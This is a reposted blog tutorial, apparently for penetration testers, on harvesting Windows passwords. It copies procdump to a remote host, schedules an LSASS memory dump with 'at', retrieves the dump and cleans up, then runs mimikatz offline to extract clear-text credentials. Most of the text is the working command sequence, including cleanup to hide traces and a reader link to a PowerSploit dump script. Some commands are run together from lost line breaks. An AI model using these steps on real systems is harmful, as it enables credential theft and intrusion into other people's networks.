博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Using Mimikatz Alpha or Getting Clear Text Passwords with a Microsoft Tool
阅读量:2434 次
发布时间:2019-05-10

本文共 2490 字,大约阅读时间需要 8 分钟。

Mimikatz is now, you can do load mimikatz from the meterpreter prompt, but if you don't want to go through the hassle of dealing with AV, reverse or bind payloads, meterpreter binaries, and you have clear text credentials for an admin, you can just use Mimikatz's alpha release that allows you to run Mimikatz on your machine against a process memory dump of LSASS. The great thing about this technique is that the only thing on disk is a Microsoft tool.

Mimikatz Minidump:

Procdump:

Lets start. First we make sure our authentication works against the box and we can look inside of C$ (usually only admins can)

net use \\TARGETBOX\C$ /user:DOMAIN\serviceaccount serviceaccount123dir \\TARGETBOX\C$

If that works then we want to check that we can all the "AT" command on the remote host:

at \\TARGETBOX

All set. Next lets prep our workspace on the remote host. We are using the C:\Temp directory.

mkdir \\TARGETBOX\C$\Tempdir \\TARGETBOX\C$\Tempcopy c:\temp\procdump.exe \\TARGETBOX\C$\copy c:\temp\procdump.bat \\TARGETBOX\C$\

The contents of procdump.bat are:

@echo offC:\temp\procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp

I'm using the computer name in the memory dump name to help me keep track of where the dump came from, but also help me notice when I've dumped more than one IP that is actually the same host.

Next we schedule the task. Use net time to determine the local time for the remote machine.

net time \\TARGETBOXat \\TARGETBOX 13:52 C:\Temp\procdump.bat

Pull down the file and clean up:

dir \\TARGETBOX\C$\Tempcopy \\TARGETBOX\C$\Temp\*lsass.dmp C:\temp\output\rmdir /s \\TARGETBOX\C$\Temp

On your side the only thing you need to make sure is that you are running Mimikatz on a similar version and architecture you pulled from. Use the following url for reference:

Load up the Alpha version of Mimikatz, switch it to minidump mode and you're dumping creds:

mimikatz # sekurlsa::minidump SUPERCOMPUTER_lsass.dmpSwitch to MINIDUMPmimikatz # sekurlsa::logonPasswords full

 

Thats it. Password dumping without ever using a "Hacker" tool on target. Much love Microsoft. And even more to Mimikatz creator - Benjamin Delpy for both this alpha release and changing his licensing to allow Mimikatz code to be integrated into Meterpreter.

Reader Comments (1)

you can even create minidump via PowerShell script =)

https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1

funny that the example given is LSASS process ;)

转载地址:http://xkemb.baihongyu.com/

你可能感兴趣的文章
RPC实践(二)JsonRPC实践
查看>>
RPC实践(三)Hessian实践
查看>>
RPC实践(五)Dubbo实践-服务集群
查看>>
java单元测试Junit实践(一) Junit基础
查看>>
Webservice实践(二)Webservice 客户端开发
查看>>
Webservice实践(三)基于JDK的jax ws进行服务端开发
查看>>
Eclipse中10个最有用的快捷键组合
查看>>
Routing
查看>>
linux下access函数的应用
查看>>
linux系统调用之文件:递归删除非空目录
查看>>
linux下获取系统时间的方法
查看>>
ubuntu12.04安装openCV2.4.6.1
查看>>
jsp与servlet的作用以及区别--为什么说JSP底层就是一个Servlet
查看>>
看HashMap源码前的必备冷知识,白话文式教学,适合刚开始了解源码的新手观看
查看>>
Oracle安装指南
查看>>
Cookie对象入门详解
查看>>
HashMap的remove()方法详解
查看>>
单例模式-分解步骤,逐步解析
查看>>
通过Form表单一次性拿到json格式数据,及后台接收
查看>>
Mybatis异常:The content of elements must consist of well-formed.......(一般出现在写分页/带大于小于号的SQL)
查看>>